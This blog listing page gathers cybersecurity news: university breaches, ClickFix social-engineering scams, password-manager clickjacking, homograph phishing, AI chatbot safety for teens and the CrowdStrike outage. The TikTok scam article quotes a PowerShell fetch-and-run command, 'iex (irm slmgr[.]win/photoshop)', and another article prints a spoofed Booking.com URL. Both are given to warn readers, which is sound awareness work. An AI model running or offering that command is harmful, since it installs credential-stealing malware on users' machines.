Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label User Security. Show all posts
Western Sydney University
Cyber Attacks Data Leak Private Data User Security Western Sydney University

Western Sydney University Hit by Major Cyberattack

 

Western Sydney University has suffered a significant cyberattack, marking the latest in a series of incidents targeting the institution since 2023. Sensitive data belonging to students, staff, and alumni—including tax file numbers, bank account details, passport and driver license information, visa and health data, contact information, and even ethnicities—was compromised when threat actors gained access to the university’s Student Management System hosted on a cloud-based platform by a third-party provider. 


The breach was discovered after two instances of unusual activity on August 6 and August 11, 2025. Investigations revealed that unauthorised access occurred through a chain involving external systems linked to the university’s infrastructure between June 19 and September 3, 2025. The attackers subsequently used this stolen data to send out fraudulent emails to students and graduates on October 6, 2025. 

These emails falsely claimed recipients had been excluded from the university or had their degrees revoked, causing widespread concern. Some scam emails appeared especially credible as they included legitimate student numbers and exploited ongoing web vulnerabilities.

The university responded by immediately initiating investigations, directing its third-party supplier to shut down access, and cooperating closely with the NSW Police Cybercrime Squad’s Strike Force Docker. Notably, in June 2025, police arrested a former student, Birdie Kingston, alleged to have played a role in earlier hacks, although officials stopped short of directly connecting this individual to the latest attack.

In recent statements, Vice-Chancellor Professor George Williams apologised for the disruption and emphasised the institution’s ongoing efforts to rectify the issue and bolster cybersecurity. The attack forms part of a troubling pattern of breaches, including incidents involving Microsoft Office 365 and other IT environments exposed since 2023. Data from previous attacks has surfaced on both the dark web and clear web, affecting thousands of current and former students.

WSU has advised affected community members to change passwords, enable multi-factor authentication, and avoid using the same password across multiple online accounts. Victims are encouraged to follow university guidance and make use of support services available. The institution continues to work with law enforcement and remains on high alert for further attacks.
Read more »
User Security
malware Photoshop Scam Social Engineering TikTok User Security

TikTok 'Free Photoshop' Scam Steals User Data via Malicious Commands

 

A sophisticated scam targeting TikTok users is exploiting the platform's reach to steal personal data by promising free access to expensive software like Adobe Photoshop. Cybercriminals are using a social engineering technique called ClickFix to trick victims into executing malicious commands that install information-stealing malware on their systems.

The scam operates through TikTok videos that demonstrate seemingly simple technical tricks to activate premium software, including Adobe Photoshop, Microsoft Windows, Discord Nitro, and other popular applications. These videos instruct users to run specific PowerShell commands on their Windows devices, with instructions that appear to be legitimate software activation methods. One example command involves executing iex (irm slmgr[.]win/photoshop), which fetches and runs malicious code from remote servers.

ClickFix attacks differ significantly from traditional phishing campaigns by guiding users through the process of infecting their own devices rather than simply tricking them into clicking malicious links. This social engineering approach exploits users' familiarity with solving minor technical issues, CAPTCHA checks, and human verification processes, making the scam appear more legitimate. Microsoft research indicates that since 2024, ClickFix has been used in nearly half of all recorded cyberattacks, surpassing phishing in popularity among cybercriminals.

When users execute the provided commands, they unknowingly download and install AuroStealer, a Trojan malware specifically designed to harvest sensitive information. This infostealer collects passwords, browser credentials, authentication cookies, cryptocurrency wallet data, and other application credentials from infected systems. The malware establishes persistence through scheduled tasks and uses self-compiling techniques to inject shellcode directly into memory, evading detection by security tools.

TikTok's short-form content delivery system and reputation for hosting legitimate technical how-to content makes it an ideal platform for this type of scam. The platform's viral nature enables these malicious videos to accumulate hundreds of likes and reach thousands of viewers before detection, with cybersecurity researcher Xavier Mertens identifying the ongoing campaign. The campaigns have been active since at least May 2025, with marked increases in activity observed through October 2025.

Security experts strongly advise users never to run commands on their machines from TikTok or other social media networks. Because these commands are executed locally on user systems, many security tools and browsers cannot easily detect them, making prevention through user education critical. Organizations should implement PowerShell execution restrictions, monitor scheduled tasks, and block known malicious domains to protect against these threats.
Read more »
User Security
ClickFix Cyber Fraud phishing Social Engineering User Security

ClickFix Attack Tricks Users into Infecting Their Own Devices

 

Cybercriminals are increasingly using a social engineering attack called ClickFix, which manipulates victims into unknowingly initiating cyberattacks on their own systems. According to Microsoft’s 2025 Digital Defense Report, ClickFix has become the most common initial access technique, recorded in 47% of attacks tracked by Microsoft Defender Experts over the past year. This rise is largely attributed to attackers’ growing ability to bypass traditional anti-phishing protections and successfully exploit human behavior.

What is ClickFix?

ClickFix is a deceptive tactic that capitalizes on users' desire to solve perceived simple technical problems. It typically starts with a phishing email or fraudulent website designed to look like a legitimate service—one notable example was seen in spoofed Booking.com emails during the 2024 holiday season. 

The victim is prompted through a fake notification to resolve an issue, often by copying and pasting a code snippet or clicking through a sequence mimicking technical support instructions. Unbeknownst to the user, these instructions result in executing malicious PowerShell or mshta.exe commands, which launch malware directly into system memory—bypassing the need for a downloaded file and evading common antivirus solutions.

Changing threat landscape

ClickFix is especially concerning because it reflects a broader shift in cybercriminal tactics: exploiting human psychology over technical vulnerabilities. Security vendors highlight that this trend is amplified by the use of artificial intelligence, which enables attackers to craft highly convincing phishing lures and even simulate full conversation threads for business email compromise schemes. 

The payloads delivered through ClickFix attacks are diverse and dangerous, including ransomware, information stealers, remote access trojans (RATs), and worms such as Xorm, Danabot, and NetSupport RAT. Reports from security vendors indicate a 500% surge in ClickFix incidents in the first half of 2025, making up an estimated 8% of all attacks during that period.

Defense strategies and user awareness

Traditional defenses based on blocking suspicious attachments, network traffic, or sender domains cannot reliably stop ClickFix. Instead, organizations and individuals must focus on behavioral change: never follow unsolicited technical instructions without independent verification, and always treat requests for manual intervention—like pasting unfamiliar code—with skepticism.

Security awareness training and updated incident response plans are crucial for combating this new wave of attacks. As threat actors continue to refine their methods, education and skepticism remain the frontline defenses against self-induced cyber threats.
Read more »
User Security
Gemini AI Google Home Nest Devices Technology User Security

Google Launches Gemini AI Across Home and Nest Devices

 

Google has unveiled its new Gemini-powered smart home lineup and AI strategy, positioning its AI assistant Gemini at the core of refreshed Google Home and Nest devices. This reimagined approach follows Amazon's recent Echo launch, highlighting an intensifying competition in the AI-driven home sector. 

Google’s aim is to extend Gemini’s capabilities beyond just its own hardware, making it available to other device manufacturers, reminiscent of how Android’s open platform fostered an expansive device ecosystem. The company plans to keep innovating with flagship hardware, particularly where Gemini’s potential can shine, while encouraging third-party OEMs and partners to integrate Gemini regardless of price point or form factor.

The new Nest lineup features products like the Nest Cam Outdoor, Nest Cam Indoor, and Nest Doorbell—all updated to leverage Gemini’s intelligence. Additionally, Google teased its next-generation Google Home speaker for spring 2026 and revealed a partnership with Walmart to launch affordable indoor cameras and doorbells under the “onn” brand. 

Notably, Google is prioritizing current device owners by rolling out Gemini features to devices with adequate processing power, using cloud APIs and the Matter smart home standard for broad compatibility. This ensures Gemini’s reach to over 800 million devices—including both Google and third-party products—while the company refines experiences before releasing new hardware.

Gemini enhances user interaction by enabling more conversational, contextually aware commands. Users can reference vague details—like a movie or song—and Gemini will intuit the correct response, such as playing music, explaining lyrics, or suggesting content. It can handle more complex household management tasks like creating shopping lists based on recipes, setting nuanced timers, and chaining multiple requests. 

Device naming is now simplified, and Gemini can manage routines, automate energy usage monitoring, and suggest home security setups via the new “Ask Home” feature. These improvements are facilitated by Google’s upgraded Home app, now more stable and powered by Gemini.

The app uses AI to summarize camera activity, describe detected events, and guide users with direct answers and recommendations, streamlining daily home routines. Gemini Live introduces continuous conversational interaction without the need to repeat “Hey Google,” promising a more natural AI experience. 

Google’s toolkit, reference hardware, and SDK support further empower partners and developers, reinforcing its market-wide AI ambitions. The Nest and Walmart devices are available now, while the new Home speaker is due spring 2026.
Read more »
User Security
Cyber Security Meta Meta Chatbot Teen Safety User Security

Meta Overhauls AI Chatbot Safeguards for Teenagers

 

Meta has announced new artificial intelligence safeguards to protect teenagers following a damaging Reuters investigation that exposed internal company policies allowing inappropriate chatbot interactions with minors. The social media giant is now training its AI systems to avoid flirtatious conversations and discussions about self-harm or suicide with teenage users. 

Background investigation 

The controversy began when Reuters uncovered an internal 200-page Meta document titled "GenAI: Content Risk Standards" that permitted chatbots to engage in "romantic or sensual" conversations with children as young as 13. 

The document contained disturbing examples of acceptable AI responses, including "Your youthful form is a work of art" and "Every inch of you is a masterpiece – a treasure I cherish deeply". These guidelines had been approved by Meta's legal, public policy, and engineering teams, including the company's chief ethicist. 

Immediate safety measures 

Meta spokesperson Andy Stone announced that the company is implementing immediate interim measures while developing more comprehensive long-term solutions for teen AI safety. The new safeguards include training chatbots to avoid discussing self-harm, suicide, disordered eating, and potentially inappropriate romantic topics with teenage users. Meta is also temporarily limiting teen access to certain AI characters that could hold inappropriate conversations.

Some of Meta's user-created AI characters include sexualized chatbots such as "Step Mom" and "Russian Girl," which will now be restricted for teen users. Instead, teenagers will only have access to AI characters that promote education and creativity. The company acknowledged that these policy changes represent a reversal from previous positions where it deemed such conversations appropriate. 

Government response and investigation

The revelations sparked swift political backlash. Senator Josh Hawley launched an official investigation into Meta's AI policies, demanding documentation about the guidelines that enabled inappropriate chatbot interactions with minors. A coalition of 44 state attorneys general wrote to AI companies including Meta, expressing they were "uniformly revolted by this apparent disregard for children's emotional well-being". 

Senator Edward Markey has urged Meta to completely prevent minors from accessing AI chatbots on its platforms, citing concerns that Meta incorporates teenagers' conversations into its AI training process. The Federal Trade Commission is now preparing to scrutinize the mental health risks of AI chatbots to children and will demand internal documents from major tech firms including Meta. 

Implementation timeline 

Meta confirmed that the revised document was "inconsistent with its broader policies" and has since removed sections allowing chatbots to flirt or engage in romantic roleplay with minors. Company spokesperson Stephanie Otway acknowledged these were mistakes, stating the updates are "already in progress" and the company will "continue to adapt our approach to help ensure teens have safe, age-appropriate experiences with AI". 

The controversy highlights broader concerns about AI chatbot safety for vulnerable users, particularly as large companies integrate these tools directly into widely-used platforms where the vast majority of young people will encounter them.
Read more »
User Security
Cyber Fraud Financial Scam India Online Trading Scam Trading App User Security

India's Biggest Cyber Fraud: Businessman Duped of ₹25 Crore Through Fake Trading App

 

A Kochi-based pharmaceutical company owner has suffered a loss of ₹25 crore in what is being described as the largest single-person cyber fraud case in India. 

The incident involved a sophisticated online trading scam, executed through a fake trading application that lured the victim with promises of lucrative returns. Despite being an experienced trader, the businessman fell prey to deception after engaging with the fraudulent app for nearly two years.

The scam unfolded over four months, during which the victim was lured by substantial profits displayed on his initial investments. These early gains convinced him of the app’s legitimacy, prompting more substantial investments.

Investigators from the Cyber Cell revealed that the app consistently showed double profits, creating an illusion of credibility and financial success. This psychological manipulation is a common tactic used by cyber fraudsters to build trust and encourage deeper engagement from unsuspecting victims. 

Trouble began when the businessman attempted to withdraw his funds, only to be met with repeated delays and a variety of excuses from the operators of the fake platform. As withdrawal requests were consistently stonewalled, suspicion grew. It was only after persistent failed attempts to access his money that the reality of the fraud became clear to the victim. 

Upon reporting the crime, swift action was taken by law enforcement. The Indian Cyber Crime Coordination Centre was immediately alerted and subsequently forwarded the information to the Thiruvananthapuram Cyber Operations Headquarters. A formal case was registered, and efforts have been initiated to freeze the remaining funds before they could be routed to additional accounts.

Investigation revealed that the fraudulent app was under the control of a foreign national, indicating possible international links and making the operation broader and more complex. The case has prompted a larger crackdown on similar cyber threats, with the Cyber Cell widening its probe to trace the perpetrators and prevent further occurrences. 

This incident highlights the growing sophistication of online financial scams in India, emphasizing the need for increased vigilance, especially even among experienced investors. Awareness and prompt reporting remain essential defenses against such evolving cyber threats.
Read more »
Vulnerabilities and Exploits
Clickjacking Attacks Credential Theft Password Manager User Security Vulnerabilities and Exploits

Major Password Managers Leak User Credentials in Unpatched Clickjacking Attacks

 

Six popular password managers serving tens of millions of users remain vulnerable to unpatched clickjacking flaws that could allow cybercriminals to steal login credentials, two-factor authentication codes, and credit card information. 

Modus operandi

Security researcher Marek Tóth, who presented these findings at DEF CON 33, demonstrated how attackers exploit these vulnerabilities by running malicious scripts on compromised websites. 

The attack works by using opacity settings and overlays to hide password manager autofill dropdown menus while displaying fake elements like cookie banners or CAPTCHA prompts. When users click on these decoy elements, they unknowingly trigger autofill actions that expose sensitive data. 

Tóth developed multiple exploitation variants, including DOM element manipulation techniques and a method where the user interface follows the mouse cursor, making any click trigger data autofill. The researcher created a universal attack script that can identify which password manager a target is using and adapt the attack in real-time. 

Impacted password managers

The vulnerable password managers include: 
  • 1Password 8.11.4.27 
  • Bitwarden 2025.7.0 
  • Enpass 6.11.6 
  • iCloud Passwords 3.1.25
  • LastPass 4.146.3 
  • LogMeOnce 7.12.4 
These services collectively have approximately 40 million users. 

Vendor responses 

Vendor responses have been mixed. 1Password dismissed the report as "out-of-scope/informative," arguing that clickjacking is a general web risk users should mitigate themselves. Similarly, LastPass initially marked the report as "informative" before later acknowledging they're working on fixes. 

Bitwarden downplayed the severity but claims to have addressed the issues in version 2025.8.0. However, LogMeOnce initially failed to respond to any communication attempts, though they later released an update. Several vendors have successfully implemented fixes, including Dashlane, NordPass, ProtonPass, RoboForm, and Keeper.

Safety measures 

Until patches are available, Tóth recommends that users disable autofill functionality in their password managers and rely on manual copy-paste operations instead. This significantly reduces the attack surface while maintaining password manager security benefits. 

The research highlights ongoing challenges in balancing user convenience with security in password management tools, particularly regarding browser extension vulnerabilities.
Read more »
User Security
Cyber Fraud Japanese Hiragana Phishing scam Phony URLs User Security

New Phishing Scam Uses Japanese Character to Perfectly Mimic Legitimate URLs

 

Cybersecurity researchers have recently flagged a highly sophisticated phishing campaign that leverages a unique tactic: the use of the Japanese hiragana character “ã‚“” to mimic the appearance of a forward slash (“/”) in website URLs. This technique is especially effective on certain fonts and browser systems, making phony URLs appear nearly identical to legitimate ones, thus tricking even vigilant internet users. 

The campaign’s primary target is customers of the travel platform Booking.com. Instead of the real URL containing forward slashes, attackers craft addresses using the “ã‚“” character, such as “https://account.booking[.]comã‚“detailã‚“restric-access.www-account-booking[.]comã‚“en/”. On first glance, these URLs look authentic, but they redirect users to fraudulent domains controlled by cybercriminals.

The malicious strategy starts with phishing emails containing these deceptive links. When clicked, users are sent to sites that deliver MSI installer files, which may secretly install malware like information stealers or remote access trojans on victim devices. 

This approach is part of a broader trend known as homograph attacks. Cybercriminals exploit visual similarities between characters from different Unicode sets, using them to spoof trusted domains. Previously, attackers have used Cyrillic letters to impersonate Latin ones; the use of Japanese “ã‚“” adds a clever new layer to these deceptions. 

According to the 2025 Phishing Trends Report, homograph attacks are evolving and becoming harder to filter out, as criminals strive to defeat security systems and bypass standard defenses. 

Safety tips 

Security experts recommend multiple protective strategies. Users should hover over links to reveal actual destination URLs, though this has limitations with sophisticated character spoofing. Modern browsers like Chrome have implemented protections against many homograph attacks, but visual URL inspection alone is insufficient. 

The most effective defense combines updated security software, email filtering, and comprehensive user education about evolving attack vectors. This campaign demonstrates how cybercriminals continuously adapt their techniques to exploit even subtle visual ambiguities in digital communication systems. 

Ultimately, this new phishing campaign highlights cybercriminals’ constant creativity in exploiting even the smallest ambiguities in digital communication. As attackers continue to adapt their methods, organizations and individuals need to stay aware of these rapidly advancing attack vectors and double down on multi-layered security measures.
Read more »
User Security
Data Privacy Facial Recognition System Regulation Bill Technology User Security

Facial Recognition's False Promise: More Sham Than Security

 

Despite the rapid integration of facial recognition technology (FRT) into daily life, its effectiveness is often overstated, creating a misleading picture of its true capabilities. While developers frequently tout accuracy rates as high as 99.95%, these figures are typically achieved in controlled laboratory settings and fail to reflect the system's performance in the real world.

The discrepancy between lab testing and practical application has led to significant failures with severe consequences. A prominent example is the wrongful arrest of Robert Williams, a Black man from Detroit who was misidentified by police facial recognition software based on a low-quality image.

This is not an isolated incident; there have been at least seven confirmed cases of misidentification from FRT, six of which involved Black individuals. Similarly, an independent review of the London Metropolitan Police's use of live facial recognition found that out of 42 matches, only eight were definitively accurate.

These real-world failures stem from flawed evaluation methods. The benchmarks used to legitimize the technology, such as the US National Institute of Standards and Technology's (NIST) Facial Recognition Technology Evaluation (FRTE), do not adequately account for real-world conditions like blurred images, poor lighting, or varied camera angles. Furthermore, the datasets used for training these systems are often not representative of diverse demographics, which leads to significant biases .

The inaccuracies of FRT are not evenly distributed across the population. Research consistently shows that the technology has higher error rates for people of color, women, and individuals with disabilities. For example, one of Microsoft’s early models had a 20.8% error rate for dark-skinned women but a 0% error rate for light-skinned men . This systemic bias means the technology is most likely to fail the very communities that are already vulnerable to over-policing and surveillance.

Despite these well-documented issues, FRT is being widely deployed in sensitive areas such as law enforcement, airports, and retail stores. This raises profound ethical concerns about privacy, civil rights, and due process, prompting companies like IBM, Amazon, and Microsoft to restrict or halt the sale of their facial recognition systems to police departments. The continued rollout of this flawed technology suggests that its use is more of a "sham" than a reliable security solution, creating a false sense of safety while perpetuating harmful biases.
Read more »
WhatsApp Web
Data Privacy Indian Government Mobile Security User Security WhatsApp Web

Indian Government Flag Security Concerns with WhatsApp Web on Work PCs

 

The Indian government has issued a significant cybersecurity advisory urging citizens to avoid using WhatsApp Web on office computers and laptops, highlighting serious privacy and security risks that could expose personal information to employers and cybercriminals. 

The Ministry of Electronics and Information Technology (MeitY) released this public advisory through its Information Security Awareness (ISEA) team, warning that while accessing WhatsApp Web on office devices may seem convenient, it creates substantial cybersecurity vulnerabilities. The government describes the practice as a "major cybersecurity mistake" that could lead to unauthorized access to personal conversations, files, and login credentials. 

According to the advisory, IT administrators and company systems can gain access to private WhatsApp conversations through multiple pathways, including screen-monitoring software, malware infections, and browser hijacking tools. The government warns that many organizations now view WhatsApp Web as a potential security risk that could serve as a gateway for malware and phishing attacks, potentially compromising entire corporate networks. 

Specific privacy risks identified 

The advisory outlines several "horrors" of using WhatsApp on work-issued devices. Data breaches represent a primary concern, as compromised office laptops could expose confidential WhatsApp conversations containing sensitive personal information. Additionally, using WhatsApp Web on unsecured office Wi-Fi networks creates opportunities for malicious actors to intercept private data.

Perhaps most concerning, the government notes that even using office Wi-Fi to access WhatsApp on personal phones could grant companies some level of access to employees' private devices, further expanding the potential privacy violations. The advisory emphasizes that workplace surveillance capabilities mean employers may monitor browser activity, creating situations where sensitive personal information could be accessed, intercepted, or stored without employees' knowledge. 

Network security implication

Organizations increasingly implement comprehensive monitoring systems on corporate devices, making WhatsApp Web usage particularly risky. The government highlights that corporate networks face elevated vulnerability to phishing attacks and malware distribution through messaging applications like WhatsApp Web. When employees click malicious links or download suspicious attachments through WhatsApp Web on office systems, they could inadvertently provide hackers with backdoor access to organizational IT infrastructure. 

Recommended safety measures

For employees who must use WhatsApp Web on office devices, the government provides specific precautionary guidelines. Users should immediately log out of WhatsApp Web when stepping away from their desks or finishing work sessions. The advisory strongly recommends exercising caution when clicking links or opening attachments from unknown contacts, as these could contain malware designed to exploit corporate networks. 

Additionally, employees should familiarize themselves with their company's IT policies regarding personal application usage and data privacy on work devices. The government emphasizes that understanding organizational policies helps employees make informed decisions about personal technology use in professional environments. 

This advisory represents part of broader cybersecurity awareness efforts as workplace digital threats continue evolving, with the government positioning employee education as crucial for maintaining both personal privacy and corporate network security.
Read more »
Vulnerabilities and Exploits
Midnight Blue Radio Encryption TETRA Radio User Security Vulnerabilities and Exploits

Security Flaws Found in Police and Military Radio Encryption

 

Cybersecurity experts have uncovered significant flaws in encryption systems used by police and military radios globally, potentially allowing malicious actors to intercept secure communications. 

Background and context 

In 2023, Dutch security researchers from Midnight Blue unearthed an intentional backdoor in TETRA (Terrestrial Trunked Radio) encryption algorithms used in radios deployed by law enforcement, intelligence agencies, and military organizations worldwide. This discovery led the European Telecommunications Standards Institute (ETSI) to recommend users implement additional end-to-end encryption (E2EE) for sensitive communications. 

The same research team has now identified that at least one version of the TCCA-endorsed E2EE solution contains similar flaws. The encryption algorithm analyzed starts with a 128-bit key but reduces it to just 56 bits before encrypting data, making it vulnerable to unauthorized access. Additionally, researchers discovered a second vulnerability that could allow attackers to send deceptive messages or replay legitimate communications.

The TETRA standard includes four encryption algorithms (TEA1, TEA2, TEA3, TEA4) designed for different security levels based on the target customer. All use 80-bit keys, but TEA1 was found to reduce to just 32 bits, enabling researchers to crack it in under a minute. The key reduction appears to be implemented to comply with export control regulations for encryption sold to customers outside Europe. 

Global impact

TETRA radios are extensively employed by law enforcement agencies in Belgium, Scandinavian nations, Eastern European countries, and Middle Eastern nations including Iran, Iraq, Lebanon, and Syria. Defense ministries in Bulgaria, Kazakhstan, and Syria, along with intelligence services from Poland, Finland, Lebanon, and Saudi Arabia also employ these systems. However, it remains unclear how many entities use the vulnerable E2EE implementation.

Disclosure challenges

The research reveals a concerning lack of transparency regarding security limitations. While some manufacturers include vulnerability information in brochures, others only address it in internal communications or don't mention it at all. A leaked product bulletin indicated that encryption key length is "subject to export control regulations," but it's uncertain whether end users are properly informed about potential security risks.

The findings will be presented at the BlackHat security conference, highlighting ongoing challenges in securing critical communications infrastructure used by law enforcement and military organizations worldwide.
Read more »
User Security
Cyber Fraud Malicious Campaign Pharmacy Scam PharmaFraud User Security

Millions Face Potential Harm After Experts Uncovered a Vast Network of 5,000+ Fake Pharmacy Sites

 

Security experts have exposed "PharmaFraud," a criminal network of more than 5,000 fraudulent online pharmacies. The operation puts millions of consumers at risk by selling unsafe counterfeit medications while also stealing their private data. 

The fraudulent campaign mimics legitimate online pharmacies and specifically targets individuals seeking discreet access to medications such as erectile dysfunction treatments, antibiotics, steroids, and weight-loss drugs. What makes this operation particularly dangerous is its use of advanced deception techniques, including AI-generated health content, fabricated customer reviews, and misleading advertisements to establish credibility with potential victims. 

These sites are designed to circumvent basic security indicators by omitting legitimate business credentials and requiring payments through cryptocurrency, which makes transactions virtually untraceable. The operation extends beyond simply selling fake drugs—it actively harvests sensitive medical information, personal details, and financial data that can be exploited in subsequent fraud schemes. 

Health and financial risks

Even when products are delivered, there's no guarantee of safety or effectiveness—medications may be expired, contaminated, or completely fake, creating health risks that extend far beyond financial losses. The report highlights that these fraudulent sites often bypass prescription requirements entirely, allowing dangerous medications to reach consumers without proper medical oversight. 

The broader cyberthreat landscape has seen escalation, with financial scams increasing by 340% in just three months, often using fake advertisements and chatbot interfaces to impersonate legitimate legal or investment services. Tech support scams appearing as browser pop-ups have also risen sharply, luring users into contacting fraudulent help services.

Safety tips 

To avoid these scams, consumers should be vigilant about several key warning signs: 

  • Websites that offer prescription medications without requiring valid prescriptions.
  • Missing or unclear contact information and business registration details.
  • Absence of verifiable physical addresses.
  • Unusually low prices and limited-time offers.
  • Payment requests specifically for cryptocurrency.

Essential security measures include verifying that websites use secure checkout processes with HTTPS protocols and trusted payment gateways. Users should also deploy antivirus software to detect malware that may be embedded in fraudulent medical sites, enable firewalls to block suspicious traffic from known scam domains, and install endpoint protection across multiple devices for comprehensive security. 

Consumers should maintain healthy skepticism toward unsolicited health advice, product reviews, or miracle cure claims found through advertisements, emails, or social media links. When in doubt, consumers should verify pharmacy legitimacy through official regulatory channels before sharing any personal or financial information.
Read more »
User Security
Child Influencer Laws Legal Framework Social Media Technology User Security

Here's Why We Need Child Influencer Laws in a Monetised Content Society

 

The increasing urgency around safeguarding children who are featured as influencers or content creators online is a concerning trend that has grown rapidly in recent years. Earlier, U.S. child labor laws like the Coogan Law were designed to protect child actors, but the rise of social media has created an environment where many minors—sometimes as family breadwinners—are now regularly producing monetized content. This shift raises new legal and ethical questions regarding consent, financial exploitation, and the long-term impact on children’s wellbeing. 

Recent popular documentaries, such as Hulu’s "Devil in the Family" and Netflix’s "Bad Influence," have brought to light extreme cases of abuse and exploitation involving child influencers. These shows highlight not only physical and emotional abuse but also the dangers posed when children’s most private moments are shared for profit. Central concerns include whether children can meaningfully consent to being featured, how difficult it is for them to refuse their parents, and who ultimately controls the digital footprint these young people accumulate. 

State legislatures are starting to take action in response to these harms. In 2023, Illinois took the lead by amending its child labour laws to specifically define vlogging as work and required parents to record their children's participation in content. Additionally, the state established trust funds to receive a percentage of the revenue.Other states, including Minnesota, Montana, California, and Utah, have enacted similar laws with unique provisions. For example, Minnesota prohibits children under 14 from engaging in content creation as labor, while Utah only mandates compensation for children when families earn a threshold amount from content. 

A key feature of some new state laws is the “right to be forgotten,” allowing individuals who were featured as minors to have their content removed later in life. While this empowers former child influencers, it can sometimes conflict with law enforcement needs for evidence. Even so, these laws mark important progress toward recognizing and addressing the specific risks faced by children in the influencer economy, mainly by treating online content creation as work and prioritizing financial safeguards. 

However, child experts stress that legislation alone cannot solve all problems associated with child influencing. Effective protection requires a collaborative approach: tech platforms should enforce clear and accessible privacy options, families must educate themselves and respect children’s right to consent, and policymakers should continue to advocate for balanced regulations. Ultimately, safeguarding the emotional and psychological wellbeing of child influencers—and considering the lasting effects of exposing personal lives online—must remain the top priority.
Read more »
User Security
Chrome Updates FBI FBI CISA advisory Mobile Security User Security

FBI Warns Chrome Users Against Unofficial Updates Downloading

 

If you use Windows, Chrome is likely to be the default browser. Despite Microsoft's ongoing efforts to lure users to the Edge and the rising threat of AI browsers, Google's browser remains dominant. However, Chrome is a victim of its own success. Because attackers are aware that you are likely to have it installed, it is the ideal entry point for them to gain access to your PC and your data. 

That is why you are seeing a series of zero-day alerts and emergency updates. This is also why the FBI is warning about the major threat posed by fraudulent Chrome updates. As part of the "ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors," the FBI and CISA, America's cyber defence agency, have issued their latest warning. 

The latest advisory addresses the recent rise in Interlock ransomware attacks. And, while the majority of the advice is aimed at individuals in charge of securing corporate networks and enforcing IT policies, it also includes a caution for PC users. Ransomware assaults require an entry point, or "initial access." And if you have a PC (or smartphone) connected to your employer's network, you are affected. The advisory also recommends that organisations "train users to spot social engineering attempts.”

In the case of Interlock, two of these ways of first entrance leverage the same lures that cybercriminals employ to target your personal accounts, as well as the data and security credentials on your own devices. You should be looking for these anyway. One of the techniques is ClickFix, which is easily detectable. This is where a notice or popup encourages you to paste content into a Windows command and run the script. It's accomplished by impersonating a technical issue, a secure website, or a file that you need to open. Any such directive is always an attack and should be ignored. 

Installing and updating fake Chrome has become commonplace, both on Android smartphones and Windows PCs. As with ClickFix, the guidance is quite explicit. Never use links in emails or texts to access upgrades or new installs. Always get updates and programs from the official websites or shops. Keep in mind that Chrome will automatically download updates and will prompt you to restart your browser to ensure the installation. Although those links are delivered to you, you are not required to look for them or click on random links.
Read more »
World Leaks
Customer Solution Centers Data Breach Dell Technologies User Security World Leaks

World Leaks Outfit Linked to Dell Test Lab Intrusion

 

Dell Technologies has acknowledged a serious security compromise affecting its Customer Solution Centers platform, the latest high-profile intrusion by the World Leaks extortion outfit. 

The breach occurred earlier this month and targeted Dell's isolated demonstration environment, which is designed to showcase commercial solutions to enterprise customers, however the company claims that critical user data and operating systems are still secure. 

The attack targeted Dell's Customer Solution Centres infrastructure, which is a controlled environment used for product presentations and proof-of-concept testing for commercial users. Threat actors were able to successfully breach this platform, which follows stringent network segmentation guidelines to keep it isolated from production systems, according to Dell's official statement. 

The platform "is intentionally separated from customer and partner systems, as well as Dell's networks and is not used in the provision of services to Dell customers," according to Dell, which underlined the purposeful isolation of the compromised environment. Multiple isolation levels and clear warnings that forbid users from uploading private or sensitive data to the demonstration environment are features of the company's security architecture. 

The breach investigation discovered that the stolen data mostly consisted of fake test information, publicly available datasets used for demonstrations, Dell scripts, system data, and testing results. The only authentic data exposed appears to be an out-of-date contact list with little operational value, severely limiting the possible impact on Dell's company operations and customer relationships. 

Security review 

Report claims that Dell's thorough security response shows how well their multi-layered defence architecture can limit the potential harm caused by advanced cyberattacks. While ensuring that partner systems, production networks, and customer data repositories are unaffected by the incident, the company's security team is still looking into the breach vectors. 

The breach's limited scope shows Dell's strong data management processes and network segmentation strategies, which effectively prevented lateral movement into vital company systems. Dell's emphasis on using synthetic data for demonstration reasons was critical in limiting the breach's potential damage, as attackers accessed created information rather than sensitive consumer or company data.

This incident shows the expanding landscape of cyber threats, as attackers increasingly target demonstration and testing environments as potential entry points into larger corporate networks, making robust security architecture vital for organisational protection.
Read more »
User Security
CrowdStrike outage Cyber Security Hospital System threat report User Security

Patient Care Technology Disruptions Linked With the CrowdStrike Outage, Study Finds

 

A little more than a year ago, nearly 8.5 million Windows-based IT systems went down due to a simple error made during a routine software update. Computers were unable to reboot for several hours due to a bug from CrowdStrike, a cybersecurity business whose products are used to detect and respond to security attacks. Many of the systems needed further manual patches, which prolonged the outage.

The estimated financial toll? Anywhere between $5 billion and $10 billion for Fortune 500 firms – and close to $2 billion for the healthcare sector specifically.

A new report reveals that the negative repercussions on healthcare organisations have gone far beyond financial. A study published in JAMA Network Open by the University of California San Diego found that the incident triggered measurable disruptions in a large proportion of US hospitals, including technical issues that impacted basic operations, research activities, and direct patient care. The researchers discovered that immediately following the CrowdStrike upgrade on July 19, 759 hospitals (out of 2232 with available data) had measurable service disruptions. That represents more than one-third of healthcare organisations.

Of a total of 1098 service outages across those organisations, 21.8% were patient-facing and had a direct impact on patient care. Just over 15% were relevant to health-care operations, with 5.3% affecting research activities. The remaining 57% were either not classified as significant or unknown. 

“Patient-facing services spanned imaging platforms, prehospital medicine health record systems, patient transfer portals, access to secure documentation, and staff portals for viewing patient details,” the researchers explained. “In addition to staff portals, we saw outages in patient access platforms across diverse hospital systems; these platforms, when operating as usual, allow patients to schedule appointments, contact health care practitioners, access laboratory results, and refill prescriptions.” 

Additionally, some hospitals experienced outages in laboratory information systems (LIS), behavioural health apps, and patient monitoring systems like foetal monitors and cardiac telemetry devices. Software in development or pre-deployment stages, informational pages, educational resources for medical and nursing students, or donation pages for institutions were primarily impacted by the outages classified as irrelevant or unknown.

3.9% of hospitals had outages longer than 48 hours, while the majority of hospital services returned within 6 hours. Outages lasting longer than two full days were most common in hospitals in South Carolina, Maryland, and New Jersey. With the majority of assessed hospitals returning to service within six hours, Southern US organizations—including those in Tennessee, North Carolina, Louisiana, Alabama, Texas, and Florida—were among the quickest to recover.

The incident served as a stark reminder that human error is and always will be a serious threat to even the most resilient-seeming technologies, while also highlighting the extraordinarily fragile nature of the modern, hyperconnected healthcare ecosystem. CrowdStrike criticised the UCSD research methods and findings, but it also acknowledged and apologised to its customers and other impacted parties for the disruption and promised to be focused on enhancing the resilience of its platform.
Read more »
Vulnerabilities and Exploits
Healthcare Firm Risk Management Threat Management User Security Vulnerabilities and Exploits

